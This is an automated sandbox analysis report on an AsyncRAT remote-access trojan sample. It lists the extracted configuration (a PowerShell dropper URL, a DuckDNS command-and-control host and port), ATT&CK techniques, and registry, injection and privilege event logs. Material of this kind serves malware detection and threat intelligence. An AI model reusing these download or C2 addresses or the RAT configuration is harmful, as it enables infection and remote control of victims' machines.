asyncrat | hxxps://drive[.]usercontent[.]google[.]com/download?id=1Jl2D3k0Hv3L5qUszIiOYPc66hMAiJu43

Analysis

max time kernel
269s
max time network
270s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 21:17

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://drive.usercontent.google.com/download?id=1Jl2D3k0Hv3L5qUszIiOYPc66hMAiJu43

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

zorra123.duckdns.org:2020

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
139	2124	powershell.exe
142	2124	powershell.exe
144	2124	powershell.exe
150	4764	powershell.exe
152	4764	powershell.exe
154	4764	powershell.exe
157	588	powershell.exe
158	588	powershell.exe
160	588	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	CScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1536	powershell.exe
4764	powershell.exe
408	powershell.exe
588	powershell.exe
2480	powershell.exe
2124	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
141	bitbucket.org
142	bitbucket.org
152	bitbucket.org
158	bitbucket.org

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2124 set thread context of 1540	2124	powershell.exe	119
PID 4764 set thread context of 1772	4764	powershell.exe	126
PID 588 set thread context of 3452	588	powershell.exe	134

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "126"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133676254431664876"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000d7b42c6dd7e4da015b73478bdde4da0102d5498bdde4da0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000af522a6dd7e4da01bedfe840dee4da01ac702f6dd8e9da0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
5040	chrome.exe
5040	chrome.exe
1952	chrome.exe
1952	chrome.exe
1952	chrome.exe
1952	chrome.exe
2480	powershell.exe
2480	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
1536	powershell.exe
1536	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
408	powershell.exe
408	powershell.exe
588	powershell.exe
588	powershell.exe
588	powershell.exe
588	powershell.exe
588	powershell.exe
588	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe
Token: SeShutdownPrivilege	5040	chrome.exe
Token: SeCreatePagefilePrivilege	5040	chrome.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
4776	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe
5040	chrome.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3100	chrome.exe
932	OpenWith.exe
1200	chrome.exe
3548	chrome.exe
3844	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5040 wrote to memory of 1100	5040	chrome.exe	83
PID 5040 wrote to memory of 1100	5040	chrome.exe	83
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
